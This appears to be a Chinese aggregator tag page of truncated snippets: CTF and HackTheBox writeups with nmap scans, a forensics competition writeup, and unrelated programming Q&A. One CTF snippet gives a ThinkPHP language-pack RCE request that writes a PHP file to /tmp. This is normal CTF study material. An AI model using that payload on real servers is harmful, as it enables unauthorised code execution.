草庐IT

lab2-Deadbeef-writeup

全部标签

2023 Real World CTF体验赛部分Writeup

web1Thinkphplang多语言RCE漏洞,直接打GET/index.php?+config-create+/+/tmp/keep.phpHTTP/1.1Host:47.98.124.175:8080Cache-Control:max-age=0Upgrade-Insecure-Requests:1User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/108.0.0.0Safari/537.36Accept:text/html,application/xhtml+x

HTB (hackthebox )Socket WriteUp ---- Season 靶机

Socketnmap┌──(root💀kali)-[~]└─#nmap-A10.10.11.206StartingNmap7.93(https://nmap.org)at2023-03-2710:53EDTNmapscanreportfor10.10.11.206Hostisup(0.72slatency).Notshown:998closedtcpports(reset)PORTSTATESERVICEVERSION22/tcpopensshOpenSSH8.9p1Ubuntu3ubuntu0.1(UbuntuLinux;protocol2.0)|ssh-hostkey:|2564fe3a6

HTB (hackthebox)Coder Insane靶机 User Flag WriteUp

Codernmap结果┌──(root💀kali)-[~]└─#nmap-A10.10.11.207StartingNmap7.93(https://nmap.org)at2023-04-0222:06EDTNmapscanreportfor10.10.11.207Hostisup(0.085slatency).Notshown:987closedtcpports(reset)PORTSTATESERVICEVERSION53/tcpopendomainSimpleDNSPlus80/tcpopenhttpMicrosoftIIShttpd10.0|_http-server-header:Mi

ruby - Sauce labs 使用有意义的名称进行测试

我正在使用rspec和cucumber在saucelabs运行watir测试。我希望测试名称(在saucelabs)与rspecdescribeblock或cucumberfeature的名称相同。所以,如果我有rspec文件:describe"something"do#tehcodezend或cucumber文件:Feature:something#tehcodez我希望在saucelabs中,测试也被命名为something。我知道如何向saucelabs说明我希望如何命名测试,但我不知道如何在测试运行时获取rspecdescribeblock名称或cucumber功能名称。更多上

c++ - "long"和 "long int"之间的区别,abs & labs

这可能只是cplusplus.com处符号的不一致。,但是C++中的“longint”和“long”类型有区别吗?cplusplus.com说abs接受“int”和“long”类型的输入,而labs使用“longint”。我认为这基本上是一个错字。如果是这样,那么abs和labs之间的唯一区别是保证labs返回long吗? 最佳答案 long和longint没有区别。我们有abs(long)和labs(long)(两者是等价的)的原因是labs()是一个C库的残余。C没有函数重载,所以函数abs()只能采用一种类型(int)并且必须

2022 长安杯 writeup

检材一问的是检材1的sha256,可以直接对检材计算,如果对磁盘做镜像的话,得到另外一个hash值(此处也算对)jar包存放目录,一是可以看历史命令,二是搜索,使用命令fina/-name"*.jar",查找所有以jar结尾的文件7000端口的文件名。在历史命令中,可以看到使用了一个shstart_web.sh的脚本,后来通过rm的命令给删掉了,所以需要过滤历史命令。思路一是找到所有jar包,查看配置文件的启动端口即可,如果没有则查看所有前端vue的config,看是否启动在7000端口。正确答案为cloud.jar管理后台对应端口,通过查看历史命令,把前端启动起来,可得端口为9090网站前台

2022 长安杯 writeup

检材一问的是检材1的sha256,可以直接对检材计算,如果对磁盘做镜像的话,得到另外一个hash值(此处也算对)jar包存放目录,一是可以看历史命令,二是搜索,使用命令fina/-name"*.jar",查找所有以jar结尾的文件7000端口的文件名。在历史命令中,可以看到使用了一个shstart_web.sh的脚本,后来通过rm的命令给删掉了,所以需要过滤历史命令。思路一是找到所有jar包,查看配置文件的启动端口即可,如果没有则查看所有前端vue的config,看是否启动在7000端口。正确答案为cloud.jar管理后台对应端口,通过查看历史命令,把前端启动起来,可得端口为9090网站前台

ios - 在 iOS 中创建/比较 Lab-profiled 颜色

对于我正在处理的应用程序,我正在尝试创建和比较(之间的距离)CIELab异形颜色。我知道有waysofconverting来自典型的RGB至Lab需要一些数学知识,但如果可能的话,我想以更优雅的方式做到这一点。创建CIELAB颜色到目前为止,我已经尝试了以下...(白/黑点和范围数字来自here)constCGFloat*components=CGColorGetComponents([UIColorcolorWithRed:.11green:.33blue:.55alpha:1.0].CGColor);floatwhitePoint[3]={0.95,1.0,1.09};floatb

Innovus零基础lab学习全面复盘总

Innovus零基础lab学习全面复盘总结(附完整版pdf)文章右侧广告为官方硬广告,与吾爱IC社区无关,用户勿点。点击进去后出现任何损失与社区无关。为了让各位训练营学员更快入门数字IC后端,从第八期IC训练营开始,小编以一个**“数字后端新手”的身份和姿态**同每个0基础学员一样,每天按照学习计划来完成Innovus零基础lab的学习实践。当然小编比各位累得多,因为要对这套lab做加减法。对原始lab中介绍的那些不怎么用的章节直接删除,对实际项目高频而且非常重要的技能做适当补充。更为要命的是还得图文并茂。今天,小编将对过去11天的innovus零基础lab学习做一个全面复盘总结。So,你们说

hadoop - cosmos.lab.fi-ware.org 的 SafeModeException

根据维基http://forge.fiware.org/plugins/mediawiki/wiki/fiware/index.php/BigData_Analysis_-_Quick_Start_for_Programmers#Step_1._Create_a_Cosmos_account通过sshmy_user@cosmos.lab.fi-ware.org1)我发现没有文件夹“/user/my_user”,只有“/home/my_user”。为什么?我可以假设我的用户没有正确创建吗?2)我正在尝试创建一个文件夹,但我得到了SafeModeException:hadoopfs-mkd